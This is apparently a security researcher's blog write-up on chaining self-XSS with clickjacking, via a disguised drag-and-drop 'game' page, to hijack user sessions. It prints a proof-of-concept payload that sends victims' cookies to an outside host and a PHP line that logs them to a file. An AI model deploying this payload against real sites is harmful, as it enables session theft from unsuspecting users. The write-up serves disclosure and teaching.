Chaining Self XSS with UI Redressing is Leading to Session Hijacking (PWN users like a boss)
while i was testing the web application i have found self xss. which has no impact. but i wanted to exploit this vulnerability, so have started thinking that how can i exploit this self xss, and then i have decided to chain the self xss with some other vulnerability.
so again a have stared looking for CSRF attack, but i dint get CSRF on the vulnerable page.
But i had noticed that application was not using the x-frame header. so thought lets check for click jacking. !
and yeah ! application was vulnerable with click jacking.
so have decided to chain Self xss with click jacking.
Here is the Click jacking which is chained with self xss which grabs victim’s cookies.
<h1 align=”center”>DRAG N DROP GAME</h1>
<img src=”https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSi0I3s6J4VZohcVZbzUzJ-g-y722W8jqyo4g1lc0HhM9SH9WN9" draggable=true id=drag ondragstart=”event.dataTransfer.setData(‘text/plain’,’<script>location=`http://armaanpathan.pe.hu/cookies.php?cookie=`+btoa(document.cookie)</script>')">
top: 2; right: 10;
opacity: 0.00 ;
top: 420; right: 30;
<H2>DRAG THE IMAGE HERE</h2>
here is the code which saves the grabbed cookies in txt file
file_put_contents(“cookies.txt”,$c . “\n\n”,FILE_APPEND);
and yeah i was able to hijack any user’s sessions.
Here is the PoC video
Spacial thanks to Rahul Maini . for helping me. :)
thanks for reading. :)